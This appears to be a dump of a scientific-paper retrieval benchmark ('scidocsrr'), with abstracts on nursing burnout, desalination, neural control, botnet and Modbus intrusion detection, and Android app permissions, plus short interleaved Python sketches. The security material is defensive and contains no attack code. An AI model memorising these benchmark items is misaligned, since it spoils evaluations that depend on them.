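The Gumbel-softmax estimator mentioned in the HM-AN passage above can be sketched in a few lines. This shows only the relaxed sampling step and the effect of temperature; the adaptive temperature training and the boundary-detector wiring described in the abstract are not reproduced, and the logits are arbitrary example values.

```python
import numpy as np

def gumbel_softmax(logits, temperature=1.0, rng=np.random.default_rng(0)):
    """Draw a 'soft' one-hot sample from a categorical distribution, the
    reparameterization used for stochastic hard attention / boundary units."""
    gumbel = -np.log(-np.log(rng.uniform(1e-12, 1.0, size=logits.shape)))
    y = (logits + gumbel) / temperature
    y = np.exp(y - y.max())
    return y / y.sum()

logits = np.array([2.0, 0.5, 0.1])
for temp in (5.0, 1.0, 0.1):      # lower temperature -> closer to a hard one-hot sample
    print(temp, np.round(gumbel_softmax(logits, temp), 3))
```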
{
"docid": "cf0d0d6895a5e5fbe1eb72e82b4d8b4b",
"text": "PURPOSE\nThe purpose of this study was twofold: (a) to determine the prevalence of compassion satisfaction, compassion fatigue, and burnout in emergency department nurses throughout the United States and (b) to examine which demographic and work-related components affect the development of compassion satisfaction, compassion fatigue, and burnout in this nursing specialty.\n\n\nDESIGN AND METHODS\nThis was a nonexperimental, descriptive, and predictive study using a self-administered survey. Survey packets including a demographic questionnaire and the Professional Quality of Life Scale version 5 (ProQOL 5) were mailed to 1,000 selected emergency nurses throughout the United States. The ProQOL 5 scale was used to measure the prevalence of compassion satisfaction, compassion fatigue, and burnout among emergency department nurses. Multiple regression using stepwise solution was employed to determine which variables of demographics and work-related characteristics predicted the prevalence of compassion satisfaction, compassion fatigue, and burnout. The α level was set at .05 for statistical significance.\n\n\nFINDINGS\nThe results revealed overall low to average levels of compassion fatigue and burnout and generally average to high levels of compassion satisfaction among this group of emergency department nurses. The low level of manager support was a significant predictor of higher levels of burnout and compassion fatigue among emergency department nurses, while a high level of manager support contributed to a higher level of compassion satisfaction.\n\n\nCONCLUSIONS\nThe results may serve to help distinguish elements in emergency department nurses' work and life that are related to compassion satisfaction and may identify factors associated with higher levels of compassion fatigue and burnout.\n\n\nCLINICAL RELEVANCE\nImproving recognition and awareness of compassion satisfaction, compassion fatigue, and burnout among emergency department nurses may prevent emotional exhaustion and help identify interventions that will help nurses remain empathetic and compassionate professionals.",
"title": ""
},
{
"docid": "5e721beeca26693426fbf9c5c6044942",
"text": "• Parameters affecting the direct capital costs of BWRO and SWRO plants were assessed. • Plants delivered through EPC contracts were considered. • Assessment was based on cost data from 950 RO plants in the GCC and southern Europe. • Plant capacity, type, award year, and region were found to affect RO CAPEX cost. • A model was also developed and verified for RO CAPEX estimation. a b s t r a c t a r t i c l e i n f o The installation of reverse osmosis (RO) desalination plants has been on the rise throughout the world. Thus, the estimation of their capital cost (CAPEX) is of major importance for governments, potential investors and consulting engineers of the industry. In this paper, parameters potentially affecting the direct capital costs of brackish water RO (BWRO) and seawater RO (SWRO) desalination plants, delivered through Engineering, Procurement & Construction (EPC) contracts, were assessed. The assessment was conducted based on cost data from 950 RO desalination plants contracted in the Gulf Cooperation Council (GCC) countries and in five southern European countries. The parameters assessed include plant capacity, location, award year, feed salinity, and the cumulative installed capacity within a region. Our results showed that plant capacity has the strongest correlation with the EPC cost. Plant type (SWRO or BWRO), plant award year and the region of the RO plant were also found to be statistically important. By utilizing multiple linear regression, a model was also developed to estimate the direct CAPEX (EPC cost) of RO desalination plants to be located either in the GCC countries or southern Europe, which was then verified using the k-fold test. In 2009, over 15,000 desalination plants were in operation worldwide with approximately half of them being reverse osmosis (RO) plants [1]. Although many countries have begun to utilize desalination to produce drinking water, no region of the world has implemented desalination as widely as the Middle East, where 50% of the world's production of desalinated water is installed [1]. Over the past 40 years, use of RO has been gradually gaining momentum in the Gulf Cooperation Council (GCC) countries, due to its lower cost, simplicity, novelties in the membrane fabrication, and the high salt rejection accomplished by RO membranes today [1–4]. It is foreseen that RO will play a key role in increasing fresh water availability globally in the future, but more so in …",
"title": ""
},
{
"docid": "5f007e018f9abc74d1d7d188cd077fe7",
"text": "Due to the intensified need for improved information security, many organisations have established information security awareness programs to ensure that their employees are informed and aware of security risks, thereby protecting themselves and their profitability. In order for a security awareness program to add value to an organisation and at the same time make a contribution to the field of information security, it is necessary to have a set of methods to study and measure its effect. The objective of this paper is to report on the development of a prototype model for measuring information security awareness in an international mining company. Following a description of the model, a brief discussion of the application results is presented. a 2006 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a2a633c972cb84d9b7d27e347bb59cfa",
"text": "This study investigated three-dimensional (3D) texture as a possible diagnostic marker of Alzheimer’s disease (AD). T1-weighted magnetic resonance (MR) images were obtained from 17 AD patients and 17 age and gender-matched healthy controls. 3D texture features were extracted from the circular 3D ROIs placed using a semi-automated technique in the hippocampus and entorhinal cortex. We found that classification accuracies based on texture analysis of the ROIs varied from 64.3% to 96.4% due to different ROI selection, feature extraction and selection options, and that most 3D texture features selected were correlated with the mini-mental state examination (MMSE) scores. The results indicated that 3D texture could detect the subtle texture differences between tissues in AD patients and normal controls, and texture features of MR images in the hippocampus and entorhinal cortex might be related to the severity of AD cognitive impairment. These results suggest that 3D texture might be a useful aid in AD diagnosis.",
"title": ""
}
] | scidocsrr |
ef1832fdfc697649796dc59c4a2ddcd9 | A virtual electrical drive control laboratory: Neuro-fuzzy control of induction motors | [
{
"docid": "1e9c7c97256e7778dbb1ef4f09c1b28e",
"text": "A new neural paradigm called diagonal recurrent neural network (DRNN) is presented. The architecture of DRNN is a modified model of the fully connected recurrent neural network with one hidden layer, and the hidden layer comprises self-recurrent neurons. Two DRNN's are utilized in a control system, one as an identifier called diagonal recurrent neuroidentifier (DRNI) and the other as a controller called diagonal recurrent neurocontroller (DRNC). A controlled plant is identified by the DRNI, which then provides the sensitivity information of the plant to the DRNC. A generalized dynamic backpropagation algorithm (DBP) is developed and used to train both DRNC and DRNI. Due to the recurrence, the DRNN can capture the dynamic behavior of a system. To guarantee convergence and for faster learning, an approach that uses adaptive learning rates is developed by introducing a Lyapunov function. Convergence theorems for the adaptive backpropagation algorithms are developed for both DRNI and DRNC. The proposed DRNN paradigm is applied to numerical problems and the simulation results are included.",
"title": ""
}
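A minimal forward-pass sketch of the diagonal recurrent structure described above: each hidden neuron feeds back only onto itself, so the recurrent weight matrix reduces to a vector. The weight scales and layer sizes are arbitrary, and the dynamic backpropagation training and the identifier/controller arrangement from the paper are not shown.

```python
import numpy as np

class DiagonalRNN:
    """Minimal sketch of a diagonal recurrent network: one hidden layer whose
    only recurrence is each neuron's self-feedback weight (a diagonal matrix)."""
    def __init__(self, n_in, n_hidden, rng=np.random.default_rng(1)):
        self.Wi = rng.normal(scale=0.3, size=(n_hidden, n_in))  # input weights
        self.Wd = rng.normal(scale=0.3, size=n_hidden)          # self-recurrent (diagonal) weights
        self.Wo = rng.normal(scale=0.3, size=n_hidden)          # output weights
        self.s = np.zeros(n_hidden)                              # hidden state

    def step(self, x):
        self.s = np.tanh(self.Wi @ x + self.Wd * self.s)         # elementwise self-recurrence
        return float(self.Wo @ self.s)

net = DiagonalRNN(n_in=2, n_hidden=4)
for t, x in enumerate([np.array([1.0, 0.0]), np.array([0.5, 0.5]), np.array([0.0, 1.0])]):
    print(t, round(net.step(x), 4))
```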
] | [
{
"docid": "b7944edc9e6704cbf59489f112f46c11",
"text": "The basic paradigm of asset pricing is in vibrant f lux. The purely rational approach is being subsumed by a broader approach based upon the psychology of investors. In this approach, security expected returns are determined by both risk and misvaluation. This survey sketches a framework for understanding decision biases, evaluates the a priori arguments and the capital market evidence bearing on the importance of investor psychology for security prices, and reviews recent models. The best plan is . . . to profit by the folly of others. — Pliny the Elder, from John Bartlett, comp. Familiar Quotations, 9th ed. 1901. IN THE MUDDLED DAYS BEFORE THE RISE of modern finance, some otherwisereputable economists, such as Adam Smith, Irving Fisher, John Maynard Keynes, and Harry Markowitz, thought that individual psychology affects prices.1 What if the creators of asset-pricing theory had followed this thread? Picture a school of sociologists at the University of Chicago proposing the Deficient Markets Hypothesis: that prices inaccurately ref lect all available information. A brilliant Stanford psychologist, call him Bill Blunte, invents the Deranged Anticipation and Perception Model ~or DAPM!, in which proxies for market misvaluation are used to predict security returns. Imagine the euphoria when researchers discovered that these mispricing proxies ~such * Hirshleifer is from the Fisher College of Business, The Ohio State University. This survey was written for presentation at the American Finance Association Annual Meetings in New Orleans, January, 2001. I especially thank the editor, George Constantinides, for valuable comments and suggestions. I also thank Franklin Allen, the discussant, Nicholas Barberis, Robert Bloomfield, Michael Brennan, Markus Brunnermeier, Joshua Coval, Kent Daniel, Ming Dong, Jack Hirshleifer, Harrison Hong, Soeren Hvidkjaer, Ravi Jagannathan, Narasimhan Jegadeesh, Andrew Karolyi, Charles Lee, Seongyeon Lim, Deborah Lucas, Rajnish Mehra, Norbert Schwarz, Jayanta Sen, Tyler Shumway, René Stulz, Avanidhar Subrahmanyam, Siew Hong Teoh, Sheridan Titman, Yue Wang, Ivo Welch, and participants of the Dice Finance Seminar at Ohio State University for very helpful discussions and comments. 1 Smith analyzed how the “overweening conceit” of mankind caused labor to be underpriced in more enterprising pursuits. Young workers do not arbitrage away pay differentials because they are prone to overestimate their ability to succeed. Fisher wrote a book on money illusion; in The Theory of Interest ~~1930!, pp. 493–494! he argued that nominal interest rates systematically fail to adjust sufficiently for inf lation, and explained savings behavior in relation to self-control, foresight, and habits. Keynes ~1936! famously commented on animal spirits in stock markets. Markowitz ~1952! proposed that people focus on gains and losses relative to reference points, and that this helps explain the pricing of insurance and lotteries. THE JOURNAL OF FINANCE • VOL. LVI, NO. 4 • AUGUST 2001",
"title": ""
},
{
"docid": "48f8c5ac58e9133c82242de9aff34fc1",
"text": "In recent years, the botnet phenomenon is one of the most dangerous threat to Internet security, which supports a wide range of criminal activities, including distributed denial of service (DDoS) attacks, click fraud, phishing, malware distribution, spam emails, etc. An increasing number of botnets use Domain Generation Algorithms (DGAs) to avoid detection and exclusion by the traditional methods. By dynamically and frequently generating a large number of random domain names for candidate command and control (C&C) server, botnet can be still survive even when a C&C server domain is identified and taken down. This paper presents a novel method to detect DGA botnets using Collaborative Filtering and Density-Based Clustering. We propose a combination of clustering and classification algorithm that relies on the similarity in characteristic distribution of domain names to remove noise and group similar domains. Collaborative Filtering (CF) technique is applied to find out bots in each botnet, help finding out offline malwares infected-machine. We implemented our prototype system, carried out the analysis of a huge amount of DNS traffic log of Viettel Group and obtain positive results.",
"title": ""
},
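One ingredient of the approach above, grouping domains by the similarity of their character distributions with a density-based clusterer, can be sketched as follows, assuming scikit-learn is available. The feature (a plain character-frequency vector), the DBSCAN parameters, and the example domains are illustrative assumptions; the paper's richer feature set and its collaborative-filtering stage are not reproduced.

```python
import numpy as np
from collections import Counter
from sklearn.cluster import DBSCAN

def char_distribution(domain, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-"):
    """Normalized character-frequency vector of a domain name (a simple stand-in
    for the 'characteristic distribution' feature mentioned in the abstract)."""
    name = domain.split(".")[0].lower()
    counts = Counter(c for c in name if c in alphabet)
    vec = np.array([counts.get(c, 0) for c in alphabet], dtype=float)
    return vec / max(vec.sum(), 1.0)

domains = ["google.com", "facebook.com", "xjkqzpvb.net", "qzkvjxpw.net", "wikipedia.org"]
X = np.vstack([char_distribution(d) for d in domains])
labels = DBSCAN(eps=0.08, min_samples=2, metric="euclidean").fit_predict(X)
print(dict(zip(domains, labels)))   # similar random-looking domains end up in one cluster
```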
{
"docid": "f74dd570fd04512dc82aac9d62930992",
"text": "A compact microstrip-line ultra-wideband (UWB) bandpass filter (BPF) using the proposed stub-loaded multiple-mode resonator (MMR) is presented. This MMR is formed by loading three open-ended stubs in shunt to a simple stepped-impedance resonator in center and two symmetrical locations, respectively. By properly adjusting the lengths of these stubs, the first four resonant modes of this MMR can be evenly allocated within the 3.1-to-10.6 GHz UWB band while the fifth resonant frequency is raised above 15.0GHz. It results in the formulation of a novel UWB BPF with compact-size and widened upper-stopband by incorporating this MMR with two interdigital parallel-coupled feed lines. Simulated and measured results are found in good agreement with each other, showing improved UWB bandpass behaviors with the insertion loss lower than 0.8dB, return loss higher than 14.3dB, and maximum group delay variation less than 0.64ns in the realized UWB passband",
"title": ""
},
{
"docid": "48317f6959b4a681e0ff001c7ce3e7ee",
"text": "We introduce the challenge of using machine learning effectively in space applications and motivate the domain for future researchers. Machine learning can be used to enable greater autonomy to improve the duration, reliability, cost-effectiveness, and science return of space missions. In addition to the challenges provided by the nature of space itself, the requirements of a space mission severely limit the use of many current machine learning approaches, and we encourage researchers to explore new ways to address these challenges.",
"title": ""
},
{
"docid": "decf4fc57d5f81050b11a4faf233b3b1",
"text": "A large number of cognitive neuroscience studies point to the similarities in the neural circuits activated during the generation, imagination, as well as observation of one's own and other's behavior. Such findings support the shared representations account of social cognition, which is suggested to provide the basic mechanism for social interaction. Mental simulation may also be a representational tool to understand the self and others. However, successfully navigating these shared representations--both within oneself and between individuals--constitutes an essential functional property of any autonomous agent. It will be argued that self-awareness and agency, mediated by the temporoparietal (TPJ) area and the prefrontal cortex, are critical aspects of the social mind. Thus, differences as well as similarities between self and other representations at the neural level may be related to the degrees of self-awareness and agency. Overall, these data support the view that social cognition draws on both domain-general mechanisms and domain-specific embodied representations.",
"title": ""
},
{
"docid": "5e333f4620908dc643ceac8a07ff2a2d",
"text": "Convolutional Neural Networks (CNNs) have reached outstanding results in several complex visual recognition tasks, such as classification and scene parsing. CNNs are composed of multiple filtering layers that perform 2D convolutions over input images. The intrinsic parallelism in such a computation kernel makes it suitable to be effectively accelerated on parallel hardware. In this paper we propose a highly flexible and scalable architectural template for acceleration of CNNs on FPGA devices, based on the cooperation between a set of software cores and a parallel convolution engine that communicate via a tightly coupled L1 shared scratchpad. Our accelerator structure, tested on a Xilinx Zynq XC-Z7045 device, delivers peak performance up to 80 GMAC/s, corresponding to 100 MMAC/s for each DSP slice in the programmable fabric. Thanks to the flexible architecture, convolution operations can be scheduled in order to reduce input/output bandwidth down to 8 bytes per cycle without degrading the performance of the accelerator in most of the meaningful use-cases.",
"title": ""
},
{
"docid": "8ba1621257292f04bb6fa2328ba5abda",
"text": "In this paper we propose an explicit computer model for learning natural language syntax based on Angluin's (1982) efficient induction algorithms, using a complete corpus of grammatical example sentences. We use these results to show how inductive inference methods may be applied to learn substantial, coherent subparts of at least one natural language – English – that are not susceptible to the kinds of learning envisioned in linguistic theory. As two concrete case studies, we show how to learn English auxiliary verb sequences (such as could be taking, will have been taking) and the sequences of articles and adjectives that appear before noun phrases (such as the very old big deer). Both systems can be acquired in a computationally feasible amount of time using either positive examples, or, in an incremental mode, with implicit negative examples (examples outside a finite corpus are considered to be negative examples). As far as we know, this is the first computer procedure that learns a full-scale range of noun subclasses and noun phrase structure. The generalizations and the time required for acquisition match our knowledge of child language acquisition for these two cases. More importantly, these results show that just where linguistic theories admit to highly irregular subportions, we can apply efficient automata-theoretic learning algorithms. Since the algorithm works only for fragments of language syntax, we do not believe that it suffices for all of language acquisition. Rather, we would claim that language acquisition is nonuniform and susceptible to a variety of acquisition strategies; this algorithm may be one these.",
"title": ""
},
{
"docid": "911c101ed07b1c1aac05c3e8513c60c3",
"text": "The Modbus/TCP protocol is commonly used in SCADA systems for communications between a human–machine interface (HMI) and programmable logic controllers (PLCs). This paper presents a model-based intrusion detection system designed specifically for Modbus/TCP networks. The approach is based on the key observation that Modbus traffic to and from a specific PLC is highly periodic; as a result, each HMI-PLC channel can be modeled using its own unique deterministic finite automaton (DFA). An algorithm is presented that can automatically construct the DFA associated with an HMI-PLC channel based on about 100 captured messages. The resulting DFA-based intrusion detection system looks deep into Modbus/TCP packets and produces a very detailed traffic model. This approach is very sensitive and is able to flag anomalies such as a message appearing out of its position in the normal sequence or a message referring to a single unexpected bit. The intrusion detection approach is tested on a production Modbus system. Despite its high sensitivity, the system has a very low false positive rate—perfect matches of the model to the traffic were observed for five of the seven PLCs tested without a single false alarm over 111 h of operation. Furthermore, the intrusion detection system successfully flagged real anomalies that were caused by technicians who were troubleshooting the HMI system. The system also helped identify a PLC that was configured incorrectly. & 2013 Elsevier B.V. All rights reserved.",
"title": ""
},
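A simplified sketch of the idea in the passage above: learn which message follows which on a given HMI-PLC channel and flag transitions never seen during learning. Here each Modbus message is reduced to a hypothetical (function, address, count) key, and the model is a plain transition set rather than the paper's full DFA.

```python
from collections import defaultdict

def learn_transitions(symbols):
    """Build the observed transition relation of a channel's message stream.
    Each symbol stands for one Modbus query key, e.g. (function, start_addr, count)."""
    allowed = defaultdict(set)
    for prev, cur in zip(symbols, symbols[1:]):
        allowed[prev].add(cur)
    return allowed

def detect(symbols, allowed):
    """Flag any transition that was never seen while learning the channel model."""
    alerts = []
    for i, (prev, cur) in enumerate(zip(symbols, symbols[1:]), start=1):
        if cur not in allowed.get(prev, set()):
            alerts.append((i, prev, cur))
    return alerts

# Toy periodic HMI->PLC polling pattern: read holding registers, read coils, repeat.
train = [("read_holding", 0, 10), ("read_coils", 0, 16)] * 50
model = learn_transitions(train)
live = [("read_holding", 0, 10), ("read_coils", 0, 16), ("write_single_coil", 7, 1)]
print(detect(live, model))   # the unexpected write is reported as an anomaly
```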
{
"docid": "3c86c8681deb58a319c2aa27c795b9a1",
"text": "By means of the Ginzburg-Landau theory of phase transitions, we study a non-isothermal model to characterize the austenite-martensite transition in shape memory alloys. In the first part of this paper, the onedimensional model proposed in [3] is modified by varying the expression of the free energy. In this way, the description of the phenomenon of hysteresis, typical of these materials, is improved and the related stressstrain curves are recovered. Then, a generalization of this model to the three dimensional case is proposed and its consistency with the principles of thermodynamics is proved. Unlike other three dimensional models, the transition is characterized by a scalar valued order parameter φ and the Ginzburg-Landau equation, ruling the evolution of φ, allows us to prove a maximum principle, ensuring the boundedness of φ itself.",
"title": ""
},
{
"docid": "95a038d92ed94e7a1cefdfab1db18c1d",
"text": "Arcing in PV systems has caused multiple residential and commercial rooftop fires. The National Electrical Code® (NEC) added section 690.11 to mitigate this danger by requiring arc-fault circuit interrupters (AFCI). Currently, the requirement is only for series arc-faults, but to fully protect PV installations from arc-fault-generated fires, parallel arc-faults must also be mitigated effectively. In order to de-energize a parallel arc-fault without module-level disconnects, the type of arc-fault must be identified so that proper action can be taken (e.g., opening the array for a series arc-fault and shorting for a parallel arc-fault). In this work, we investigate the electrical behavior of the PV system during series and parallel arc-faults to (a) understand the arcing power available from different faults, (b) identify electrical characteristics that differentiate the two fault types, and (c) determine the location of the fault based on current or voltage of the faulted array. This information can be used to improve arc-fault detector speed and functionality.",
"title": ""
},
{
"docid": "75b0c2009aa648bfa1007416b193a567",
"text": "Many domain-specific search tasks are initiated by document-length queries, e.g., patent invalidity search aims to find prior art related to a new (query) patent. We call this type of search Query Document Search. In this type of search, the initial query document is typically long and contains diverse aspects (or sub-topics). Users tend to issue many queries based on the initial document to retrieve relevant documents. To help users in this situation, we propose a method to suggest diverse queries that can cover multiple aspects of the query document. We first identify multiple query aspects and then provide diverse query suggestions that are effective for retrieving relevant documents as well being related to more query aspects. In the experiments, we demonstrate that our approach is effective in comparison to previous query suggestion methods.",
"title": ""
},
{
"docid": "337d77c84241135d958e98b64014ad40",
"text": "Three-dimensional (3D) image acquisition systems are rapidly becoming more affordable, especially systems based on commodity electronic cameras. At the same time, personal computers with graphics hardware capable of displaying complex 3D models are also becoming inexpensive enough to be available to a large population. As a result, there is potentially an opportunity to consider new virtual reality applications as diverse as cultural heritage and retail sales that will allow people to view realistic 3D objects on home computers. Although there are many physical techniques for acquiring 3D data—including laser scanners, structured light and time-of-flight—there is a basic pipeline of operations for taking the acquired data and producing a usable numerical model. We look at the fundamental problems of range image registration, line-of-sight errors, mesh integration, surface detail and color, and texture mapping. In the area of registration we consider both the problems of finding an initial global alignment using manual and automatic means, and refining this alignment with variations of the Iterative Closest Point methods. To account for scanner line-of-sight errors we compare several averaging approaches. In the area of mesh integration, that is finding a single mesh joining the data from all scans, we compare various methods for computing interpolating and approximating surfaces. We then look at various ways in which surface properties such as color (more properly, spectral reflectance) can be extracted from acquired imagery. Finally, we examine techniques for producing a final model representation that can be efficiently rendered using graphics hardware.",
"title": ""
},
{
"docid": "3b2ddbef9ee3e5db60e2b315064a02c3",
"text": "It is indispensable to understand and analyze industry structure and company relations from documents, such as news articles, in order to make management decisions concerning supply chains, selection of business partners, etc. Analysis of company relations from news articles requires both a macro-viewpoint, e.g., overviewing competitor groups, and a micro-viewpoint, e.g., grasping the descriptions of the relationship between a specific pair of companies collaborating. Research has typically focused on only the macro-viewpoint, classifying each company pair into a specific relation type. In this paper, to support company relation analysis from both macro-and micro-viewpoints, we propose a method that extracts collaborative/competitive company pairs from individual sentences in Web news articles by applying a Markov logic network and gather extracted relations from each company pair. By this method, we are able not only to perform clustering of company pairs into competitor groups based on the dominant relations of each pair (macro-viewpoint) but also to know how each company pair is described in individual sentences (micro-viewpoint). We empirically confirmed that the proposed method is feasible through analysis of 4,661 Web news articles on the semiconductor and related industries.",
"title": ""
},
{
"docid": "d40cff7f20708ff80b50909029f939d3",
"text": "In this paper, we present an assessment of NFC (near field communication) for future mobile payment systems. NFC is expected to become a very trendy technology for mobile services, more specifically for mobile payments. The objective of our paper is to evaluate in a systematic manner the potential of NFC as an upcoming technology for mobile payments. In order to ensure the rigor of our research, we used a formal and structured approach based on multi-actor multi-criteria methods. Our research provides one of the first assessment of NFC and a realistic picture of the current Swiss situation as we involved numerous mobile payment experts. Our findings show that Swiss industry experts are quite enthusiastic about the future of NFC.",
"title": ""
},
{
"docid": "57ea5e1d282fc47989bdd1c997e07cbf",
"text": "a r t i c l e i n f o This study investigates the moderating effect of recommendation source credibility on the causal relationships between informational factors and recommendation credibility, as well as its moderating effect on the causal relationship between recommendation credibility and recommendation adoption. Using data from 199 responses from a leading online consumer discussion forum in China, we find that recommendation source credibility significantly moderates two informational factors' effects on readers' perception of recommendation credibility, each in a different direction. Further, we find that source credibility negatively moderates the effect of recommendation credibility on recommendation adoption. Traditional word-of-mouth (WOM) has been shown to play an important role on consumers' purchase decisions (e.g., [2]). With the popularization of the Internet, more and more consumers have shared their past consuming experiences (i.e., online consumer recommendation) online, and researchers often refer to this online WOM as electronic word-of-mouth (eWOM). Given the distinct characteristics of Internet communication (e.g., available to individuals without the limitation of time and location, directed to multiple individuals simultaneously), eWOM has conquered known limitations of traditional WOM. In general, eWOM has global reach and influence. In China, many online consumer discussion forums support eWOM, and much previous research [3,7,12,13,21] demonstrates that because eWOM provides indirect purchasing knowledge to readers, the recommendations on these forums can significantly affect their attitudes towards various kinds of consuming targets (e.g., stores, products and services). Various prior studies have postulated large numbers of antecedent factors which can affect information readers' cognition towards the recommendations, and many of them stem from elaboration likelihood model (ELM) (e. that there are two distinct routes that can affect information readers' attitude toward presented information: (1) the central route that considers the attitude formation (or change) as the result of the receivers' diligent consideration of the content of the information (informational factors); and (2) the peripheral route that requires less cognitive work attuned to simple cues in the information to influence attitude (information-irrelevant factors). ELM suggests two factors, named information readers' motivation and ability, can be the significant moderators to shift the effects of central and peripheral factors on readers' perception of information credibility. Other researchers [24,27] posit that the peripheral factor – source credibility – may also have a moderating rather than a direct effect on the causal relationship between the informational factors and the information credibility; this view is consistent with the attribution inference …",
"title": ""
},
{
"docid": "9c951a9bf159c073471107bd3c1663ee",
"text": "Collision tumor means the coexistence of two adjacent, but histologically distinct tumors without histologic admixture in the same tissue or organ. Collision tumors involving ovaries are extremely rare. We present a case of 45-year-old parous woman with a left dermoid cyst, with unusual imaging findings, massive ascites and peritoneal carcinomatosis. The patient underwent cytoreductive surgery. The histopathology revealed a collision tumor consisting of an invasive serous cystadenocarcinoma and a dermoid cyst.",
"title": ""
},
{
"docid": "24d55c65807e4a90fb0dffb23fc2f7bc",
"text": "This paper presents a comprehensive study of deep correlation features on image style classification. Inspired by that, correlation between feature maps can effectively describe image texture, and we design various correlations and transform them into style vectors, and investigate classification performance brought by different variants. In addition to intralayer correlation, interlayer correlation is proposed as well, and its effectiveness is verified. After showing the effectiveness of deep correlation features, we further propose a learning framework to automatically learn correlations between feature maps. Through extensive experiments on image style classification and artist classification, we demonstrate that the proposed learnt deep correlation features outperform several variants of convolutional neural network features by a large margin, and achieve the state-of-the-art performance.",
"title": ""
},
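The intra- and inter-layer correlation features described above are essentially Gram-style products between flattened feature maps, which can be sketched as below. The activations are random placeholders and the normalization is one simple choice; the paper's exact variants and its learned-correlation framework are not reproduced.

```python
import numpy as np

def intra_layer_correlation(fmap):
    """Gram-style correlation between the feature maps of one conv layer.
    `fmap` has shape (channels, height, width); the result is (channels, channels)."""
    c = fmap.shape[0]
    flat = fmap.reshape(c, -1)
    return flat @ flat.T / flat.shape[1]

def inter_layer_correlation(fmap_a, fmap_b):
    """Correlation between feature maps of two layers with equal spatial size."""
    a = fmap_a.reshape(fmap_a.shape[0], -1)
    b = fmap_b.reshape(fmap_b.shape[0], -1)
    return a @ b.T / a.shape[1]

rng = np.random.default_rng(0)
layer1 = rng.normal(size=(4, 8, 8))   # placeholder conv activations
layer2 = rng.normal(size=(6, 8, 8))
style_vec = np.concatenate([intra_layer_correlation(layer1).ravel(),
                            inter_layer_correlation(layer1, layer2).ravel()])
print(style_vec.shape)                 # flattened correlations form the style vector
```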
{
"docid": "eb627274abac685976f74217e106ce8a",
"text": "Phenylpropanoids may act as nonsteroidal anti-inflammatory drug (NSAID)-like compounds. 4-cis, 8-cis-Bis (4-hydroxy-3-methoxyphenyl)-3, 7-dioxabicyclo-[3.3.0]octane-2,6-dione (bis-FA, compound 2), a dimer of ferulic acid, was synthesized from ferulic acid (1), and its effect on lipopolysaccharide (LPS)-stimulated cyclooxygenase-2 (COX-2) expression in RAW 264.7 cells was compared with those of the parent ferulic acid (1) and of iso-ferulic acid (3-hydroxy-4-methoxycinnamic acid) (3). LPS-induced gene expression of COX-2 was markedly inhibited by compound 2 at a concentration of 10 microM and by compound 3 at 100 microM, but was not inhibited by compound 1 at 100 microM. This observation suggests that compound 2 may possess potent anti-inflammatory activity. These ferulic acid-related compounds were able to scavenge the stable 1, 1-diphenyl-2-picrylhydrazyl (DPPH) radical. The 50% inhibitory concentration for DPPH radicals declined in the order 3 (40.20 mM) > 2 (3.16 mM) > 1 (0.145 mM). Compound 1 possessed potent anti-radical activity, but no COX-2 inhibitory activity, which may be a result of enhancement of its conjugate properties by abstraction of an H atom from the phenolic OH group, causing loss of phenolic function. In contrast, inhibition of COX-2 expression by compounds 2 and 3 could be caused by their increased phenolic function, which is associated with decreased anti-radical activity. Compounds 2 and 3, particularly 2, may have potential as NSAID-like compounds.",
"title": ""
},
{
"docid": "774d5a1072fc18229975f1886afe2caa",
"text": "Previous studies have shown that with advancing age the size of the dental pulp cavity is reduced as a result of secondary dentine deposit, so that measurements of this reduction can be used as an indicator of age. The aim of the present study was to find a method which could be used to estimate the chronological age of an adult from measurements of the size of the pulp on full mouth dental radiographs. The material consisted of periapical radiographs from 100 dental patients who had attended the clinics of the Dental Faculty in Oslo. The radiographs of six types of teeth from each jaw were measured: maxillary central and lateral incisors and second premolars, and mandibular lateral incisors, canines and first premolars. To compensate for differences in magnification and angulation on the radiographs, the following ratios were calculated: pulp/root length, pulp/tooth length, tooth/root length and pulp/root width at three different levels. Statistical analyses showed that Pearson's correlation coefficient between age and the different ratios for each type of tooth was significant, except for the ratio between tooth and root length, which was, therefore, excluded from further analysis. Principal component analyses were performed on all ratios, followed by regression analyses with age as dependent variable and the principal components as independent variables. The principal component analyses showed that only the two first of them had significant influence on age, and a good and easily calculated approximation to the first component was found to be the mean of all the ratios. A good approximation to the second principal component was found to be the difference between the mean of two width ratios and the mean of two length ratios, and these approximations of the first and second principal components were chosen as predictors in regression analyses with age as the dependent variable. The coefficient of determination (r2) for the estimation was strongest when the ratios of the six teeth were included (r2 = 0.76) and weakest when measurements from the mandibular canines alone were included (r2 = 0.56). Measurement on dental radiographs may be a non-invasive technique for estimating the age of adults, both living and dead, in forensic work and in archaeological studies, but the method ought to be tested on an independent sample.",
"title": ""
}
] | scidocsrr |
3439d981bf62de851f1d7d695df797d1 | AutoCog: Measuring the Description-to-permission Fidelity in Android Applications | [
{
"docid": "b91c93a552e7d7cc09d477289c986498",
"text": "Application Programming Interface (API) documents are a typical way of describing legal usage of reusable software libraries, thus facilitating software reuse. However, even with such documents, developers often overlook some documents and build software systems that are inconsistent with the legal usage of those libraries. Existing software verification tools require formal specifications (such as code contracts), and therefore cannot directly verify the legal usage described in natural language text of API documents against the code using that library. However, in practice, most libraries do not come with formal specifications, thus hindering tool-based verification. To address this issue, we propose a novel approach to infer formal specifications from natural language text of API documents. Our evaluation results show that our approach achieves an average of 92% precision and 93% recall in identifying sentences that describe code contracts from more than 2500 sentences of API documents. Furthermore, our results show that our approach has an average 83% accuracy in inferring specifications from over 1600 sentences describing code contracts.",
"title": ""
},
{
"docid": "2ab6b91f6e5e01b3bb8c8e5c0fbdcf24",
"text": "Application markets such as Apple’s App Store and Google’s Play Store have played an important role in the popularity of smartphones and mobile devices. However, keeping malware out of application markets is an ongoing challenge. While recent work has developed various techniques to determine what applications do, no work has provided a technical approach to answer, what do users expect? In this paper, we present the first step in addressing this challenge. Specifically, we focus on permissions for a given application and examine whether the application description provides any indication for why the application needs a permission. We present WHYPER, a framework using Natural Language Processing (NLP) techniques to identify sentences that describe the need for a given permission in an application description. WHYPER achieves an average precision of 82.8%, and an average recall of 81.5% for three permissions (address book, calendar, and record audio) that protect frequentlyused security and privacy sensitive resources. These results demonstrate great promise in using NLP techniques to bridge the semantic gap between user expectations and application functionality, further aiding the risk assessment of mobile applications.",
"title": ""
}
] | [
{
"docid": "0fb16cdc0b8b8371493fb57cbfacec4f",
